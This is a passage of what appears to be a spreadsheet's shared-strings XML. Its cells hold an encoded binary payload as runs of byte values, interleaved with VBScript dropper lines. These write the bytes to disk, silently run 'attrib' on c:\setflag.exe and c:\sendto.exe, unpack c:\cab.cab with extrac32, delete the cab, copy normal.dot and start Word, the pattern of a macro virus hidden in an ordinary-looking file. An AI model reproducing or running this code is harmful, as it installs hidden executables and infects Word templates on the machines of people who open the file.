140 7 29 108 74 39 62 114 194 124 140 24 70 222 182 176 9 169 163 7 173 44 67 50 25 37 229 160 133 77 34 113 139 188 29 173 211 206 240 239 171 246 243 92 250 45 155 30 197 89 101 69 128 242 170 92 84 114 93 116 171 220 176 202 93 35 207 126 237 184 129 135 237 163 236 116 111 76 199 194 221 233 213 108 7 181 71 65 183 252 211 27 184 149 6 47 125 72 84 122 168 </t>
  </si>
  <si>
    <t>ch=CByte(mid(hv,n,m-n))</t>
  </si>
  <si>
    <t xml:space="preserve">119 41 87 29 74 50 234 93 112 153 24 144 222 159 130 190 171 122 93 0 118 85 124 199 100 208 40 79 143 43 53 158 248 132 252 169 197 61 69 15 209 92 235 193 16 203 142 184 76 9 108 99 32 1 101 247 123 126 71 212 107 176 223 5 215 48 55 181 147 152 152 225 251 3 91 174 60 28 242 167 83 146 43 61 96 112 123 100 195 16 1 4 28 239 8 117 164 207 66 227 182 97 143 220 159 18 179 84 158 142 234 25 143 124 242 183 177 246 56 147 71 254 171 15 1 55 124 50 152 137 204 4 108 51 151 137 97 83 197 41 161 178 92 218 170 61 109 146 203 67 179 111 66 195 76 70 9 72 7 200 63 128 16 85 60 66 190 209 126 35 81 233 244 26 156 93 97 214 174 37 185 43 162 225 151 234 248 248 147 198 19 252 176 106 59 2 164 253 103 148 193 208 201 202 162 115 12 192 230 117 93 100 103 253 12 110 69 138 157 138 246 204 42 155 160 252 179 212 166 42 105 82 219 184 194 72 109 95 42 70 169 109 12 58 48 233 237 207 236 157 230 236 58 201 214 246 204 88 173 119 241 137 146 40 204 224 7 105 210 143 104 208 123 2 242 31 235 235 2 192 47 238 26 97 191 53 122 132 244 52 29 67 210 213 160 48 3 53 80 91 34 219 181 200 192 234 4 106 34 177 37 210 163 135 68 111 165 117 159 161 13 207 17 27 30 81 42 253 241 49 46 130 49 102 107 99 76 191 57 70 39 153 181 156 254 136 228 28 159 136 125 57 17 27 211 99 132 82 100 193 101 138 186 180 30 228 100 135 171 236 75 22 195 241 23 56 96 43 3 104 183 121 14 85 198 94 140 157 60 220 3 119 120 126 46 27 228 195 185 112 161 239 196 11 93 114 201 110 216 173 161 173 154 122 165 59 27 121 9 135 45 92 245 214 214 54 200 234 144 13 2 105 240 234 43 47 11 115 106 97 39 154 191 255 41 146 134 142 79 40 115 23 114 191 82 249 167 189 211 186 78 106 86 20 230 67 78 213 124 232 164 253 136 249 127 32 151 19 234 33 10 116 135 242 201 205 38 175 190 34 45 94 47 84 143 245 255 27 253 178 244 194 243 128 81 200 78 137 239 176 247 247 </t>
  </si>
  <si>
    <t>put #1,,ch</t>
  </si>
  <si>
    <t xml:space="preserve">86 24 180 135 11 131 249 208 13 251 224 174 12 96 248 123 159 13 1 0 179 23 155 113 216 7 119 126 238 116 134 242 41 238 95 64 56 224 35 12 223 49 70 7 251 129 165 25 76 44 107 213 52 234 238 253 136 172 60 128 136 29 122 6 234 190 229 128 244 79 126 82 181 31 113 255 137 82 9 13 180 169 64 122 138 241 3 31 195 35 26 134 140 163 0 245 83 193 43 94 98 171 163 1 223 108 84 73 18 230 96 220 22 38 173 189 242 202 43 74 90 254 156 40 16 112 118 170 140 15 186 242 63 226 211 69 88 49 198 108 45 240 14 224 231 35 4 204 234 56 103 25 76 140 234 42 127 117 126 15 153 234 47 111 205 236 34 153 99 156 185 47 187 21 187 142 149 144 150 30 56 0 219 137 189 135 151 105 118 6 47 167 177 166 98 22 111 150 195 52 208 203 200 225 233 228 47 205 224 223 105 24 247 5 28 85 128 170 54 217 47 235 72 147 121 217 143 163 32 131 131 49 108 209 13 130 97 147 74 174 203 94 224 197 17 36 110 43 220 129 155 38 76 216 171 158 174 196 203 227 170 234 176 15 4 175 245 186 62 27 232 198 148 21 182 239 50 143 79 170 188 106 62 148 98 62 20 182 247 239 154 3 210 243 27 4 212 121 216 10 78 252 13 126 158 245 138 248 14 127 193 120 245 229 149 43 123 87 170 93 97 238 196 150 141 1 52 6 6 170 168 46 65 108 180 174 209 170 23 106 122 221 1 131 252 118 50 234 179 32 227 75 132 193 82 239 68 177 87 171 36 87 76 209 97 198 190 14 67 62 130 210 225 22 16 27 206 77 182 176 36 97 151 219 197 105 35 71 12 236 29 218 210 91 122 247 37 98 39 61 123 183 66 3 202 236 145 35 9 172 69 43 178 98 17 180 173 252 46 244 34 22 82 14 167 19 38 224 45 165 68 159 21 62 234 12 206 228 163 143 238 202 136 181 117 52 212 111 237 233 33 45 221 205 71 107 130 233 124 116 247 174 169 177 230 142 134 46 89 149 161 88 99 208 212 155 155 143 69 248 2 124 117 4 41 42 240 165 124 63 154 233 14 38 30 212 159 38 181 39 213 177 93 228 81 114 101 221 71 219 112 121 </t>
  </si>
  <si>
    <t>n=m+1</t>
  </si>
  <si>
    <t xml:space="preserve">246 198 94 95 30 23 151 60 131 223 21 156 64 117 164 250 97 119 120 63 66 178 238 186 176 150 81 247 63 49 220 79 225 162 126 184 159 134 160 15 227 192 115 220 161 158 64 89 158 157 218 71 107 25 137 30 204 65 211 150 152 247 168 153 216 90 140 223 138 183 95 69 114 235 3 41 113 183 215 35 254 6 120 192 140 209 1 35 145 239 179 45 220 20 88 110 174 73 153 219 155 180 170 103 202 234 18 118 62 108 145 5 90 57 167 144 205 192 85 240 191 51 178 105 26 0 148 62 184 134 187 138 74 253 141 155 183 68 52 203 75 118 58 86 53 119 225 99 182 110 139 249 137 86 181 1 10 214 112 55 54 110 214 8 47 161 235 37 236 63 104 164 61 41 70 218 239 224 7 116 18 251 49 208 147 251 129 180 223 165 147 118 147 70 218 185 1 97 134 146 213 249 91 252 103 72 16 155 10 49 138 196 80 242 193 54 109 225 18 54 197 22 22 166 96 251 92 20 16 230 186 99 56 254 231 237 119 159 47 253 102 251 221 87 75 136 189 232 193 82 205 126 247 126 12 195 144 119 25 188 165 244 207 180 223 197 198 255 180 253 46 66 125 179 253 174 94 127 15 4 237 224 89 240 13 224 107 193 111 2 191 1 124 89 233 95 202 126 151 204 132 138 3 126 21 252 27 224 79 148 254 87 216 239 230 150 77 216 239 14 173 185 173 253 110 222 26 178 30 8 188 183 24 226 117 224 247 174 249 35 246 187 8 249 231 217 239 146 54 255 67 246 187 122 219 23 161 255 203 224 175 129 31 3 79 67 182 9 124 6 248 111 149 253 165 236 119 181 249 113 192 223 98 240 143 128 111 40 251 11 217 239 198 211 143 13 217 38 34 86 157 100 87 219 194 189 69 248 121 215 117 254 6 29 124 96 244 55 112 77 176 76 206 7 72 0 184 27 226 209 254 33 198 216 143 129 5 130 227 176 154 48 85 108 210 213 87 160 42 108 130 213 165 0 163 177 96 112 73 226 109 70 140 165 228 53 112 163 121 196 106 198 107 27 177 207 209 172 91 209 6 232 107 22 255 35 69 71 105 131 185 235 58 106 13 13 192 130 255 223 211 55 153 104 224 158 240 115 133 64 2 228 </t>
  </si>
  <si>
    <t>m=instr(n,hv," ")</t>
  </si>
  <si>
    <t xml:space="preserve">255 106 34 223 220 133 28 60 90 97 144 79 42 155 136 160 40 117 83 195 120 229 200 243 240 9 7 69 49 143 188 150 124 29 152 33 184 76 4 37 123 180 35 65 28 116 107 144 192 133 7 223 141 181 8 163 197 150 178 148 211 60 225 217 19 185 148 155 138 21 254 61 149 240 223 40 79 85 85 41 142 142 21 104 27 7 25 54 192 200 35 23 12 99 43 248 206 189 143 200 32 163 31 223 57 50 250 241 90 126 92 141 217 209 166 77 124 208 66 62 112 193 218 140 71 254 252 67 210 187 56 176 37 246 137 155 46 211 235 90 235 128 90 55 188 237 54 31 172 205 214 62 88 179 169 249 5 247 195 221 193 173 242 249 2 134 141 158 186 203 80 65 83 196 248 212 204 23 181 151 102 70 152 131 48 202 61 62 159 167 78 222 230 32 101 63 218 170 189 9 160 201 221 96 34 150 39 144 207 114 50 158 4 81 36 67 229 44 50 154 24 87 85 9 174 140 62 44 69 113 105 142 202 205 86 185 44 173 28 173 150 80 238 194 134 46 125 28 179 145 56 69 26 177 114 12 225 159 4 151 213 231 211 192 69 87 182 102 4 205 56 64 106 179 170 153 207 19 155 77 161 250 162 253 188 185 235 71 72 248 59 128 60 221 201 135 141 217 99 178 5 168 1 12 79 124 91 112 125 196 151 143 169 74 58 202 228 34 14 88 232 32 57 98 245 197 252 142 143 216 237 30 149 251 72 235 33 96 152 104 23 6 93 14 131 37 69 26 150 47 146 149 17 184 51 32 32 46 26 113 165 209 172 35 191 99 182 185 11 25 70 59 55 251 169 187 180 161 125 181 10 204 80 247 30 194 83 74 254 163 98 249 112 173 64 222 163 9 111 169 91 15 74 244 82 13 231 77 9 26 206 31 9 213 67 4 231 233 19 56 219 206 17 148 161 247 243 236 207 189 208 201 197 175 245 195 254 8 240 241 249 56 218 231 83 146 52 100 188 158 58 43 114 79 56 170 34 93 186 53 119 125 23 95 147 7 46 53 96 176 33 155 193 35 215 125 210 43 149 170 108 90 40 143 98 25 135 120 165 164 123 132 187 10 137 205 92 98 14 158 72 241 136 190 157 152 218 219 108 167 44 109 </t>
  </si>
  <si>
    <t>loop</t>
  </si>
  <si>
    <t xml:space="preserve">59 245 229 34 119 125 206 30 225 86 160 116 13 98 187 151 236 40 16 76 14 106 88 210 226 128 50 7 203 188 218 78 2 254 228 128 190 147 222 35 231 244 145 253 185 250 110 201 22 93 179 161 165 196 190 12 228 124 226 246 140 91 171 115 233 199 177 77 179 143 88 106 102 77 108 154 44 143 71 3 22 93 214 184 77 147 165 45 174 224 26 178 71 216 109 32 186 72 203 225 226 208 38 31 53 85 56 249 215 4 238 35 159 199 43 223 253 5 57 91 74 106 108 13 206 217 70 112 13 236 87 217 5 42 55 228 213 218 199 45 163 183 10 77 226 198 7 166 22 215 228 160 110 67 44 249 223 253 202 170 199 41 39 91 30 253 138 78 73 218 208 79 247 150 245 211 104 85 178 162 183 255 77 164 65 243 81 39 146 207 102 155 184 196 208 133 167 148 180 78 180 200 70 62 115 90 232 88 8 7 215 147 178 125 62 21 54 14 108 142 220 212 9 41 41 183 210 3 66 182 43 10 8 149 43 203 102 130 25 157 151 48 254 0 177 73 53 144 252 150 203 57 71 197 183 187 13 226 5 145 17 29 180 59 242 174 58 191 97 171 99 242 223 110 76 186 73 55 233 38 221 164 155 116 147 110 210 77 186 73 55 233 38 221 127 185 251 254 118 138 26 175 165 40 147 159 162 102 129 191 23 252 82 240 69 224 31 1 95 11 190 25 124 59 248 189 224 15 128 63 4 254 36 120 25 124 2 212 159 13 126 17 248 82 240 181 224 119 130 191 12 109 238 131 240 167 224 127 14 254 8 248 19 224 63 194 50 240 55 192 167 60 78 81 89 224 179 193 47 4 255 29 240 101 224 55 129 111 0 255 52 248 103 193 191 4 254 231 143 107 248 170 224 10 178 28 84 5 248 32 215 200 214 239 240 91 253 193 96 83 208 74 81 105 41 20 181 161 108 157 199 163 229 96 146 242 148 172 93 29 151 164 138 214 149 59 75 214 222 204 89 191 52 119 81 94 90 202 3 86 174 177 230 177 6 191 149 109 178 214 55 214 179 245 53 13 245 187 253 214 58 127 77 179 86 15 225 150 33 28 254 164 129 191 177 137 123 188 206 218 210 92 179 205 111 221 14 125 55 52 237 170 </t>
  </si>
  <si>
    <t xml:space="preserve">143 171 88 195 214 55 53 222 172 183 244 182 245 90 216 218 63 82 111 9 214 107 230 130 126 235 206 250 32 203 213 52 88 183 115 141 219 16 198 186 173 166 161 129 0 34 220 226 219 182 191 165 169 209 223 90 207 62 88 195 98 96 101 113 136 19 237 63 148 127 235 184 155 154 253 208 112 83 99 75 19 164 107 253 59 235 183 197 193 234 115 228 111 109 246 111 99 253 181 100 102 226 231 21 97 150 125 5 102 7 215 192 214 179 117 65 127 77 45 204 208 182 39 190 10 127 251 121 209 43 225 111 17 0 120 90 74 205 99 141 77 193 29 48 1 177 223 150 96 253 193 29 245 141 183 206 87 110 254 109 219 243 55 194 12 54 53 238 240 55 178 0 142 176 121 183 133 173 9 62 206 33 96 75 108 126 115 23 33 236 246 134 38 232 174 241 113 107 115 83 125 35 75 170 66 78 173 191 86 235 191 188 126 91 176 169 165 105 59 107 245 214 183 224 82 21 230 228 88 215 235 27 180 172 254 177 96 77 176 13 225 82 112 207 233 217 46 156 142 185 41 41 110 109 80 223 193 239 151 22 46 92 72 45 143 141 178 177 6 160 184 198 39 26 155 118 53 174 160 168 213 126 182 172 166 133 117 194 22 216 233 119 55 53 115 205 36 79 75 251 234 27 107 155 118 81 229 254 150 150 154 199 253 43 155 90 157 20 215 226 15 218 22 45 172 109 104 184 121 222 241 252 172 88 231 160 86 130 199 248 103 16 142 232 241 157 21 14 106 55 248 229 181 55 225 7 240 220 109 253 239 65 59 142 227 108 21 54 237 216 81 211 88 91 86 223 232 119 82 172 1 114 188 254 96 11 236 35 138 234 160 92 112 74 96 53 182 193 36 82 63 54 20 195 30 95 21 244 227 232 12 250 220 147 37 163 168 59 169 194 134 166 22 127 49 52 212 224 167 94 166 86 53 112 45 117 171 234 27 252 43 185 237 219 161 57 138 58 159 224 11 214 179 126 204 163 254 150 180 228 108 128 51 64 101 37 172 135 157 77 178 169 23 18 54 232 219 216 31 235 148 26 37 56 114 193 32 236 192 88 102 32 193 227 103 177 138 27 183 158 31 250 255 95 9 149 141 117 164 243 90 87 </t>
  </si>
  <si>
    <t>close #1</t>
  </si>
  <si>
    <t xml:space="preserve">235 54 127 51 158 3 0 32 101 217 136 107 121 83 45 215 64 122 95 11 123 200 73 81 255 72 225 72 92 55 207 129 135 13 194 110 110 113 82 175 221 166 196 71 157 76 240 213 215 250 11 235 106 130 27 154 202 241 44 175 108 99 253 84 18 182 255 117 112 138 249 230 124 31 69 237 64 252 181 185 42 108 130 189 15 39 0 97 61 108 173 62 129 84 38 166 17 219 13 109 176 97 220 90 105 13 208 188 230 146 198 237 77 78 234 239 200 12 22 249 91 216 96 83 27 245 67 146 42 4 18 1 232 80 111 37 120 53 234 72 150 234 193 132 245 108 67 101 227 46 56 13 212 235 177 18 109 234 169 151 72 189 245 126 45 217 142 88 197 225 176 152 210 90 68 52 156 212 91 100 29 220 216 61 245 11 114 202 10 221 20 245 16 98 182 206 85 142 241 21 24 199 37 114 214 214 6 201 218 29 49 148 1 69 208 15 59 204 121 13 246 224 106 172 93 183 93 91 239 139 134 137 89 220 208 20 155 90 234 45 67 89 97 121 77 179 54 93 80 43 28 159 134 217 243 104 179 129 41 156 29 128 240 222 154 3 48 107 92 235 215 186 202 190 122 214 39 221 164 155 116 147 110 210 77 186 73 55 233 254 148 59 116 167 131 250 241 106 199 68 122 227 108 199 215 96 238 219 241 208 130 45 247 237 88 132 127 108 11 40 42 248 88 14 181 42 91 179 72 68 23 254 158 99 34 52 24 226 42 90 190 222 31 218 118 24 254 8 62 9 186 159 116 147 238 207 117 137 176 245 82 245 248 28 136 199 126 207 241 175 227 226 248 175 147 24 61 254 87 113 241 61 113 241 189 113 241 31 196 197 159 141 139 63 23 23 71 67 65 252 105 69 84 6 60 163 203 217 152 192 109 111 77 124 110 230 55 237 109 235 54 237 227 183 107 143 105 70 21 71 33 196 250 7 30 211 190 189 111 133 16 127 100 160 24 194 233 16 102 67 152 14 97 180 70 251 230 36 12 33 54 252 60 132 179 80 76 135 16 127 182 241 190 26 237 127 9 83 16 182 66 48 188 213 65 161 242 97 8 194 221 16 158 128 16 255 35 194 187 248 17 10 132 111 64 24 213 126 228 146 156 199 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">59 226 206 158 81 15 113 238 178 180 249 37 134 99 248 63 42 146 245 49 227 231 71 140 30 38 235 97 138 94 150 26 87 118 135 94 23 67 179 222 174 69 207 195 113 78 215 61 230 207 213 243 151 232 105 167 158 46 212 211 110 189 206 122 61 223 163 135 62 189 253 42 189 239 6 61 31 127 178 1 245 43 248 83 150 56 55 65 29 215 36 29 62 164 227 220 169 135 79 235 229 188 94 222 165 183 131 255 254 17 200 30 245 130 158 238 211 241 57 160 247 247 247 122 254 255 209 241 123 79 47 63 173 151 103 77 209 230 34 230 12 9 52 217 66 104 196 191 245 233 182 167 231 234 249 63 61 175 133 125 63 209 194 206 31 15 225 146 81 142 39 67 36 60 8 240 253 251 207 238 183 222 230 28 116 142 107 161 67 15 255 247 159 9 239 212 195 67 0 255 254 75 23 95 154 69 253 235 75 242 75 27 111 223 254 147 125 36 134 63 227 82 113 118 243 89 43 181 229 108 224 236 162 175 195 159 58 243 241 208 117 144 160 159 140 213 156 116 147 110 210 77 186 73 55 233 38 221 164 155 116 255 63 220 255 3 24 156 25 249 28 30 0 128 67 75 236 61 11 116 83 199 149 35 33 176 73 28 91 124 28 12 24 243 16 159 24 97 20 155 143 237 240 9 194 198 4 103 49 22 182 49 180 113 106 132 45 35 61 100 73 145 100 12 27 118 81 119 113 14 212 104 227 238 226 46 77 147 28 218 101 123 186 57 156 214 105 56 45 39 101 79 156 141 115 32 41 73 73 154 156 165 105 178 135 228 108 55 228 71 217 109 210 165 141 131 246 222 59 243 158 222 179 36 219 73 211 108 207 238 27 233 206 247 206 204 157 59 119 62 111 222 155 153 186 47 247 209 28 223 66 207 44 184 61 95 204 235 198 65 11 226 230 206 125 50 151 157 158 252 194 188 51 166 205 47 204 107 242 250 34 234 59 218 54 119 0 223 146 238 242 72 225 174 128 228 11 72 27 234 27 165 206 96 187 199 113 203 45 55 45 80 158 185 190 246 187 95 254 244 189 191 63 172 192 166 255 254 230 225 231 193 252 206 135 143 146 105 251 240 33 50 27 124 109 94 12 87 242 118 213 48 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">182 217 52 129 93 168 251 64 37 245 50 203 51 221 108 130 25 125 169 152 236 227 252 127 154 120 200 112 138 82 89 185 219 34 158 117 148 103 66 122 199 9 254 79 60 162 172 57 88 197 154 133 85 93 187 208 46 97 156 132 41 110 49 227 15 34 23 179 255 240 138 43 54 11 146 173 88 142 204 202 17 245 236 139 130 57 180 72 16 84 154 186 182 2 233 236 116 224 187 115 124 198 51 139 178 91 83 43 21 156 131 142 112 36 220 198 68 25 92 2 207 149 130 231 220 57 231 55 119 106 179 169 107 108 174 106 174 43 47 117 108 216 188 217 104 69 134 50 148 161 12 101 40 67 25 202 80 134 50 148 161 12 245 167 175 134 31 175 144 227 190 10 57 112 188 82 126 212 90 41 71 0 182 236 170 144 95 245 86 200 102 48 75 106 236 242 67 96 62 212 86 33 111 159 82 41 183 63 81 33 255 96 131 93 126 181 205 46 215 54 217 229 51 143 216 229 175 65 252 229 7 86 202 147 79 87 200 123 0 255 158 45 118 121 251 78 187 60 167 163 66 222 2 241 76 109 229 242 235 127 99 151 15 62 82 41 63 59 80 46 251 250 203 229 111 255 176 66 254 171 29 118 249 155 219 237 178 251 137 74 249 69 200 227 69 192 157 243 147 74 217 12 230 218 123 43 228 59 255 173 88 190 145 87 41 15 77 44 151 191 51 173 82 126 254 214 74 185 6 112 191 59 169 92 94 51 189 82 222 8 254 229 64 255 87 238 178 203 222 175 219 229 119 165 10 249 73 160 97 101 94 133 124 3 252 176 124 139 216 116 42 231 220 101 78 246 70 25 127 0 190 110 117 178 77 96 22 205 117 178 133 0 7 240 126 72 128 39 1 150 74 78 246 10 128 109 30 135 173 0 67 0 102 155 147 57 4 212 3 108 21 240 85 128 127 0 248 145 128 127 5 248 133 128 137 243 57 44 2 40 22 176 31 224 91 0 223 23 240 51 128 151 4 196 23 56 217 227 11 57 124 99 145 147 253 248 54 14 205 197 78 118 239 98 39 123 86 64 187 221 201 246 44 113 178 159 11 248 4 32 183 196 201 182 1 252 5 192 63 2 188 0 240 17 192 123 75 157 108 154 195 201 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extrac32 /EKKKKKKKKKKKc:\cab.cab", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">86 3 180 1 244 2 60 1 240 75 128 223 2 236 46 117 178 23 1 238 1 222 252 147 128 167 0 94 21 188 74 44 92 1 220 74 44 108 34 221 79 250 2 210 11 73 63 76 250 116 210 143 147 94 76 250 49 210 143 146 190 147 244 13 164 183 144 94 64 186 133 244 65 210 25 233 175 144 190 143 244 82 210 55 147 126 145 244 11 164 159 34 189 146 244 118 210 119 144 126 137 244 40 233 231 73 31 34 253 0 233 107 72 63 67 250 9 210 251 72 63 68 250 89 210 157 164 127 143 244 211 164 187 72 223 68 186 149 244 16 233 37 164 15 144 238 37 253 36 233 18 233 57 164 199 72 207 38 253 97 43 114 211 251 225 52 39 187 114 21 191 12 32 85 170 89 146 241 231 222 159 125 237 111 79 221 253 88 227 175 115 170 127 159 39 190 192 55 49 101 53 198 21 14 202 158 182 104 25 126 88 16 99 205 106 232 208 173 162 158 132 66 123 193 12 60 180 142 251 31 254 237 116 93 123 71 18 154 171 86 206 187 54 215 174 243 255 75 157 235 38 54 89 44 140 93 46 114 178 195 211 33 173 107 165 148 73 54 75 126 179 243 14 192 89 72 15 97 223 52 254 173 1 190 63 199 179 185 122 211 244 53 244 241 122 192 19 21 22 119 84 83 172 15 77 201 178 92 132 60 79 64 123 29 50 51 42 199 162 169 184 2 229 100 118 214 194 214 179 106 182 10 204 110 200 109 63 152 123 217 46 208 125 44 192 162 204 195 194 96 122 192 214 2 76 11 179 32 147 193 213 6 238 50 230 32 204 144 209 225 255 31 82 40 119 138 42 118 242 187 132 213 54 0 110 105 250 161 138 171 47 155 214 127 253 39 191 8 188 243 163 200 71 55 129 228 226 15 219 135 86 185 192 141 242 110 17 235 184 102 145 54 166 213 34 112 173 162 61 109 154 145 252 214 13 115 50 197 184 139 111 184 40 75 10 52 195 239 60 146 11 195 43 0 34 32 139 97 144 213 16 72 36 74 236 110 144 202 14 176 249 65 74 35 32 205 17 146 225 78 144 219 93 170 228 162 218 77 50 29 129 120 232 231 99 110 136 209 1 88 126 214 78 50 143 10 191 255 209 183 3 55 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extract /EKKKKKKKKKKKc:\cab.cab", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">216 28 96 223 7 192 212 124 208 237 163 156 34 106 188 110 29 101 14 112 121 1 207 79 223 206 224 247 56 77 68 85 8 220 110 74 29 99 54 234 168 217 168 161 134 167 59 157 232 105 4 255 14 136 211 13 88 97 8 109 161 48 27 0 210 209 70 185 56 32 44 68 169 251 192 199 77 188 9 2 253 152 71 148 226 69 89 23 132 187 40 204 11 254 247 129 219 39 120 35 17 253 65 192 106 31 37 37 198 182 16 78 39 81 59 178 60 188 147 85 82 231 223 251 180 64 60 37 6 246 30 251 0 187 83 148 43 125 8 151 27 44 97 27 132 135 160 62 21 158 167 75 19 203 221 14 174 168 90 191 73 236 70 176 253 185 136 167 207 79 27 139 127 199 212 70 189 97 68 164 128 37 218 173 169 117 198 236 25 234 33 83 140 73 106 154 124 224 89 8 253 109 61 171 131 20 92 172 6 236 11 129 227 183 3 134 68 252 138 146 212 236 2 215 18 72 17 117 60 99 127 44 154 194 80 127 1 33 123 73 220 0 148 44 10 116 38 49 139 71 161 61 21 27 235 248 15 165 55 53 85 45 141 218 54 18 133 112 172 5 124 143 21 164 182 16 128 148 202 88 5 91 6 161 203 216 114 208 151 147 94 6 191 82 162 143 191 115 58 76 223 127 185 129 138 54 248 117 138 246 130 239 86 66 224 27 129 159 34 207 168 114 41 255 118 72 27 235 189 155 248 134 189 138 95 248 50 209 70 83 249 164 228 119 148 242 11 209 120 216 73 212 243 190 137 1 5 62 234 39 194 244 117 32 151 81 196 232 2 28 137 237 0 217 225 210 214 38 232 80 242 84 228 163 72 149 93 73 199 157 136 24 109 35 66 158 118 65 250 30 145 6 82 24 2 252 165 16 186 10 220 237 212 7 120 168 29 106 219 75 97 90 190 107 83 102 172 36 165 239 146 198 140 211 92 181 190 92 121 103 213 218 186 119 151 187 217 29 222 208 21 226 118 220 166 69 27 251 68 152 43 12 51 21 190 119 139 135 135 61 158 198 104 88 141 91 187 12 98 11 59 248 131 163 58 24 218 175 186 235 130 123 61 42 46 38 83 31 242 4 52 249 18 178 80 138 95 83 36 186 197 163 </t>
  </si>
  <si>
    <t>fso.deletefile cabfile</t>
  </si>
  <si>
    <t xml:space="preserve">113 111 9 70 85 251 102 119 212 83 231 233 172 118 251 253 155 219 27 58 84 255 70 79 180 126 151 76 219 208 58 212 180 192 7 137 35 187 38 162 54 47 93 122 138 255 182 192 30 53 30 164 81 27 209 148 29 227 248 34 81 109 26 213 110 65 95 85 48 232 71 122 187 244 121 0 109 73 30 213 7 196 254 73 125 154 90 124 133 103 202 56 142 115 66 197 126 188 72 63 110 43 254 218 243 103 223 1 165 117 243 67 176 189 56 133 212 31 47 119 230 16 222 224 55 231 55 137 4 63 101 238 92 205 251 151 97 150 126 174 230 26 134 242 35 238 149 187 120 193 192 190 253 92 207 10 200 209 194 204 177 115 61 37 96 195 239 68 227 100 115 37 242 113 186 223 113 164 103 232 70 34 113 174 231 44 232 24 35 222 143 182 120 60 132 164 230 227 179 64 60 94 66 246 28 202 107 24 95 189 203 224 148 184 19 91 172 204 188 254 25 10 226 214 68 62 62 95 196 251 209 209 32 110 6 75 228 159 228 232 19 137 168 87 32 11 162 178 231 130 200 246 12 246 38 87 214 227 109 137 23 122 251 209 247 200 148 222 158 139 104 174 183 244 246 99 4 188 58 166 231 18 249 228 200 38 239 73 202 17 83 223 42 242 74 228 227 227 205 95 15 73 189 23 227 117 49 78 60 100 57 73 205 242 2 68 225 89 98 127 20 175 137 185 226 113 116 37 19 192 103 165 222 243 156 152 211 255 9 196 188 210 107 58 98 238 93 111 57 82 101 233 93 159 125 164 42 187 183 54 231 200 221 152 255 21 204 191 127 39 47 100 33 47 164 200 31 108 37 156 183 33 226 101 161 134 72 217 156 200 183 18 90 78 222 83 20 222 51 24 221 2 100 102 101 32 83 102 80 24 136 141 238 6 181 238 144 80 48 240 57 239 141 71 162 148 139 174 150 38 243 106 177 20 100 170 22 167 174 90 110 82 51 95 80 160 205 156 115 226 177 107 227 175 150 74 202 209 153 169 90 78 168 213 114 179 154 101 75 129 190 90 78 164 175 22 136 61 168 198 206 225 229 219 135 185 41 60 241 170 194 186 53 190 237 98 131 90 184 92 206 197 154 139 128 115 154 243 13 159 146 243 </t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", myfolder, True</t>
  </si>
  <si>
    <t xml:space="preserve">158 58 223 243 92 212 252 222 27 128 50 133 39 247 48 38 7 81 213 36 57 229 86 200 59 238 82 27 4 224 79 229 248 167 17 191 238 34 240 214 201 211 253 30 175 89 192 152 198 51 37 58 206 242 72 249 163 208 209 197 233 40 224 233 14 21 168 53 37 138 197 9 138 215 13 108 85 139 53 75 228 48 208 48 34 57 188 177 157 39 55 135 39 151 61 19 207 74 245 94 33 106 7 146 108 61 196 75 231 26 33 191 88 220 186 190 180 141 191 72 91 238 129 116 229 158 171 161 74 148 123 158 40 247 64 230 114 47 80 133 161 96 166 78 24 250 93 92 92 209 195 165 74 50 151 7 46 156 183 92 5 225 28 234 189 233 8 94 44 117 100 147 165 247 238 236 35 155 178 123 27 114 142 184 212 102 202 59 33 209 16 147 205 52 222 159 195 25 209 199 169 210 54 90 206 18 145 163 174 209 246 83 163 125 57 239 16 94 45 0 180 47 84 105 95 161 163 253 28 245 172 46 242 59 171 250 29 187 193 87 61 206 245 28 5 219 205 36 240 131 163 246 67 37 31 100 238 135 84 254 156 189 161 45 160 150 63 31 188 159 153 63 28 227 167 28 35 142 4 1 86 127 31 154 46 75 111 28 105 69 220 254 227 228 147 35 79 240 54 205 84 217 57 162 242 215 100 236 231 128 71 183 169 60 242 143 224 209 105 176 177 71 77 96 59 5 182 9 49 146 175 99 152 75 77 223 168 108 201 127 127 212 238 249 208 204 212 238 249 144 82 239 241 28 173 32 64 3 232 199 204 33 131 19 90 9 200 209 8 141 82 170 9 74 169 172 106 239 157 119 104 30 23 132 98 181 144 39 63 155 32 212 13 166 237 231 149 18 207 127 111 20 65 216 214 55 170 20 188 253 238 88 82 240 236 187 127 116 41 176 171 12 26 156 153 58 202 108 16 4 92 16 4 92 84 8 120 69 33 224 146 32 96 68 171 46 25 217 170 11 51 182 106 77 111 166 169 191 32 175 191 37 42 121 255 158 70 72 167 207 114 10 33 205 92 127 39 70 173 191 182 119 50 215 159 152 255 112 12 202 5 176 226 3 104 222 109 233 37 2 16 55 126 134 124 4 250 84 129 126 84 160 </t>
  </si>
  <si>
    <t>set word=createobject("word.application")</t>
  </si>
  <si>
    <t xml:space="preserve">247 41 232 199 20 244 227 28 93 169 50 222 30 82 171 76 215 199 151 168 108 144 102 165 214 210 163 87 198 95 75 209 89 88 75 206 52 98 82 8 249 56 212 124 98 105 242 41 191 50 254 57 199 149 204 83 193 228 216 54 150 52 196 73 26 158 83 165 225 118 149 188 19 179 62 147 52 108 59 49 234 184 181 237 237 177 90 228 114 142 17 63 37 88 61 160 176 250 180 194 234 51 156 213 28 221 242 246 231 212 128 117 210 80 170 178 225 98 154 90 234 251 143 241 215 18 73 3 159 25 166 145 134 101 201 25 232 108 253 12 0 109 52 159 63 195 41 90 78 204 141 65 29 175 225 30 43 196 100 62 145 127 158 207 19 227 107 168 4 248 50 197 197 159 100 32 71 124 205 226 194 179 187 241 40 240 252 3 52 183 225 120 151 120 50 184 111 207 187 97 54 54 147 16 151 33 138 226 13 205 198 107 74 118 168 189 88 57 226 237 67 188 158 16 103 96 122 188 10 196 59 138 120 58 18 82 240 42 17 239 228 216 249 222 129 211 40 155 218 179 224 139 36 112 198 241 126 152 173 220 201 249 119 102 118 234 224 115 126 182 118 240 209 119 82 186 241 194 197 197 54 71 243 148 17 143 159 229 131 240 240 13 117 16 22 247 210 64 216 235 55 52 113 245 5 184 172 45 64 188 231 117 30 225 125 77 98 